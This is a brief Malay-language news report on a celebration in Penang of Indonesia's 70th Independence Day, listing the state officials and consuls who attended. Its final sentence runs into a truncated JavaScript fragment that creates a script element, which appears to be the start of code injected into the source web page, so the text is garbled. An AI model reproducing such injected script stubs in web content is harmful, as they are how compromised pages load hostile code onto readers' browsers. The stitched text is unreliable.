Sambutan Kemerdekaan Ke-70 Republik Indonesia meriah

PENUH BERMAKNA… Lebih 500 hadirin memeriahkan Majlis Sambutan Hari Kemerdekaan Ke-70 Republik Indonesia yang diadakan dengan penuh meriah menerusi pengisian pelbagai acara bercirikan budaya negara tersebut di sini baru-baru ini.

Mengetuai delegasi Kerajaan Negeri adalah Ketua Menteri, Y.A.B. Tuan Lim Guan Eng serta isteri.

Turut sama, Setiausaha Politik kepada Ketua Menteri merangkap Ahli Dewan Undangan Negeri (ADUN) Air Itam, Wong Hon Wai; ADUN Kebun Bunga, Cheah Kah Peng; Setiausaha Kerajaan Negeri, Dato’ Seri Farizan Darus; Ahli Parlimen Bukit Bendera, Zairil Khir Johari serta isteri dan Ketua Pegawai Eksekutif Penang Institute, Dr. Lim Kim Hua.

Selain itu, tetamu kehormat lain yang turut memeriahkan majlis berkaitan, Konsul Jeneral Jepun di Pulau Pinang, H.E. Mr Ryuji Noda, Konsul Terhormat Russia di Pulau Pinang, Teoh Seng Lee dan Konsul Jeneral Thailand di Pulau Pinang, Ekajit Kraivichien.

Ketibaan para tetamu disambut sendiri oleh Konsul Jeneral Republik Indonesia di Pulau Pinang, Bapak Ronald J.P. Manik serta isteri.

Selain kepelbagaian busana tradisional yang diperagakan, para jemputan yang hadir turut dipukau oleh persembahan tarian yang begitu unik.var d=document;var s=d.createElement(‘script’);